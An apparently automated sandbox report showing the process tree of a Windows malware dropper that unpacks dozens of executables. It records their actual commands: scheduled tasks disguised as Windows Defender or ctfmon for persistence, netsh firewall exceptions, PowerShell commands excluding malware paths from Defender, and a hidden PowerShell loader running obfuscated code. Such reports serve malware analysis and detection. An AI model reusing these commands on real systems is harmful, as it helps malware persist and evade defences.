C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f32⤵
- Scheduled Task/Job: Scheduled Task
PID:4692
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\mdUccNyCCYLE.bat" "32⤵PID:564
-
C:\Windows\system32\chcp.comchcp 6500133⤵PID:8328
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost33⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8644
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"33⤵PID:9964
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f34⤵PID:7228
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\5rgEJYIJDIde.bat" "34⤵PID:5588
-
C:\Windows\system32\chcp.comchcp 6500135⤵PID:10444
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost35⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5952
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"35⤵PID:7868
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f36⤵
- Scheduled Task/Job: Scheduled Task
PID:10124
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\wNFICOsl3bvE.bat" "36⤵PID:12692
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\testme.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\testme.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:3108 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\testme.exe" "testme.exe" ENABLE3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3192
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\svchost.exe"2⤵
- Executes dropped EXE
PID:2796
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\nbothjkd.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\nbothjkd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3284 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\nbothjkd.exe" /rl HIGHEST /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3792
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\nobody.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\nobody.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:3724
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\22.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\22.exe"2⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3992
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Steanings.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Steanings.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4544
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\smell-the-roses.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\smell-the-roses.exe"2⤵PID:4268
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\cistest.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\cistest.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4592
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\mthimskef.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\mthimskef.exe"2⤵PID:8620
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\XClient.exe"2⤵PID:10064
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:3016
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\discord.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\discord.exe"2⤵PID:2300
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\A.I_1003H.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\A.I_1003H.exe"2⤵PID:9812
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\k360.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\k360.exe"2⤵PID:13196
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\keygen.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\keygen.exe"2⤵PID:13604
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\4363463463464363463463463.exe"1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\prueba.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\prueba.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2156
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\update.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\update.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3572
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\ytjgjdrthjdw.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\ytjgjdrthjdw.exe"2⤵
- Executes dropped EXE
PID:3612
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\wildfire-test-pe-file.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\wildfire-test-pe-file.exe"2⤵PID:3176
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Tinder%20Bot.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Tinder%20Bot.exe"2⤵PID:4904
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\qNVQKFyM.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\qNVQKFyM.exe"2⤵PID:6728
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\ewm.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\ewm.exe"2⤵PID:6868
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Organiser.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Organiser.exe"2⤵PID:4568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 5203⤵
- Program crash
PID:5728
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Neverlose%20Loader.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Neverlose%20Loader.exe"2⤵PID:5340
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\2klz.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\2klz.exe"2⤵PID:5140
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\RunTimeBroker%20(2).exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\RunTimeBroker%20(2).exe"2⤵PID:12224
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\TCP.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\TCP.exe"2⤵PID:13008
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\svchost.exe"2⤵PID:13036
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77svchost" /tr '"C:\Users\Admin\AppData\Roaming\$77svchost.exe"' & exit3⤵PID:14368
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpCF50.tmp.bat""3⤵PID:14408
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\china.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\china.exe"2⤵PID:14740
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\4363463463464363463463463.exe"1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\2klz.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\2klz.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2688 -
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3032 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\TUVQTyxSOhma.bat" "4⤵PID:1800
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:2728
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:448
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3348 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RzkrZbfmGQUv.bat" "6⤵PID:3440
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:3468
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3476
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3336 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YgPMtqsiQWSg.bat" "8⤵PID:3412
-
C:\Windows\system32\chcp.comchcp 650019⤵PID:3380
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3356
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3728 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7SL53kYcR69X.bat" "10⤵PID:3988
-
C:\Windows\system32\chcp.comchcp 6500111⤵PID:4036
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost11⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4052
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2148 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\MbgQ5tzvuLA0.bat" "12⤵PID:3640
-
C:\Windows\system32\chcp.comchcp 6500113⤵PID:2080
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3808
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"13⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2464 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\lknHb8YR9WDA.bat" "14⤵PID:3648
-
C:\Windows\system32\chcp.comchcp 6500115⤵PID:1764
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:976
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"15⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1716 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QUahZMN3yoei.bat" "16⤵PID:824
-
C:\Windows\system32\chcp.comchcp 6500117⤵PID:3228
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost17⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3252
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"17⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3268 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\R9gsXEjd8oLE.bat" "18⤵PID:3660
-
C:\Windows\system32\chcp.comchcp 6500119⤵PID:2740
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost19⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3400
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"19⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:824 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Ep3ZMveOBeaE.bat" "20⤵PID:3780
-
C:\Windows\system32\chcp.comchcp 6500121⤵PID:2724
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost21⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3956
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"21⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1408 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\caDtczmiEKdX.bat" "22⤵PID:3440
-
C:\Windows\system32\chcp.comchcp 6500123⤵PID:3664
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost23⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3644
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"23⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4956 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\AZV2RiPcBGE2.bat" "24⤵PID:4380
-
C:\Windows\system32\chcp.comchcp 6500125⤵PID:4460
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4140
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"25⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2220 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G6JKUCqvBrFD.bat" "26⤵PID:4468
-
C:\Windows\system32\chcp.comchcp 6500127⤵PID:3616
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost27⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4372
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"27⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4784 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\pX7f0yPSjat0.bat" "28⤵PID:3696
-
C:\Windows\system32\chcp.comchcp 6500129⤵PID:4668
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost29⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4128
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"29⤵PID:6876
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\NE5ayB8CrqW9.bat" "30⤵PID:6600
-
C:\Windows\system32\chcp.comchcp 6500131⤵PID:5588
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost31⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6720
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"31⤵PID:8184
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\OkcYCfEWce4Q.bat" "32⤵PID:7244
-
C:\Windows\system32\chcp.comchcp 6500133⤵PID:9492
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost33⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8832
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"33⤵PID:7216
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ZKeJCDiG9JlW.bat" "34⤵PID:7072
-
C:\Windows\system32\chcp.comchcp 6500135⤵PID:9484
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost35⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6384
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"35⤵PID:8888
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\lmao.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\lmao.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2448 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:2600
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2840 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1040
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\testingg.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\testingg.exe"2⤵PID:8560
-
C:\Users\Admin\AppData\Roaming\server.exe"C:\Users\Admin\AppData\Roaming\server.exe"3⤵PID:4440
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:10184
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"4⤵
- Modifies Windows Firewall
PID:9196
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:7796
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 6924⤵PID:3516
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\handeltest.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\handeltest.exe"2⤵PID:9208
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\wefhrf.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\wefhrf.exe"2⤵PID:6280
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\wefhrf.exe'; Add-MpPreference -ExclusionProcess 'wefhrf'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"3⤵
- Command and Scripting Interpreter: PowerShell
PID:6340
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\XClient.exe"2⤵PID:7664
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\test.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\test.exe"2⤵PID:7252
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\35DF.tmp\35E0.tmp\35E1.bat C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\test.exe"3⤵PID:10308
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Gorebox%20ModMenu%201.2.0.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Gorebox%20ModMenu%201.2.0.exe"2⤵PID:6048
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\PURCHASE%20ORDER%20006-2024%20GIA-AV%20Rev%201_pdf.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\PURCHASE%20ORDER%20006-2024%20GIA-AV%20Rev%201_pdf.exe"2⤵PID:7808
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Operationalist=gc -raw 'C:\Users\Admin\AppData\Local\faatallige\Enthusiastical\Equoid.Dol';$halvmaanedlig=$Operationalist.SubString(7767,3);.$halvmaanedlig($Operationalist) "3⤵
- Command and Scripting Interpreter: PowerShell
PID:14572
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Client-built.exe"2⤵PID:8208
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\mos%20ssssttttt.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\mos%20ssssttttt.exe"2⤵PID:7820
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\build.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\build.exe"2⤵PID:5416
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\ew.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\ew.exe"2⤵PID:7316
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Coc%20Coc.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Coc%20Coc.exe"2⤵PID:7612
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\780.tmp\781.tmp\782.bat C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Coc%20Coc.exe"3⤵PID:5484
-
C:\Users\Admin\AppData\Roaming\portable_util.exeportable_util.exe --register-coccoc-portable --force-uid=3849d47c-687c-49be-b315-4e062899d124 --skip-import --skip-welcome --do-not-create-shortcut --force-regenerate-hid4⤵PID:12128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\crypted_c360a5b7.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\crypted_c360a5b7.exe"2⤵PID:11956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11956 -s 523⤵
- Program crash
PID:12008
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\1223.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\1223.exe"2⤵PID:12780
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\4363463463464363463463463.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:624 -
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Sentil.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Sentil.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3452 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe" /rl HIGHEST /f3⤵PID:3936
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:328 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:3320
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\evetbeta.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\evetbeta.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
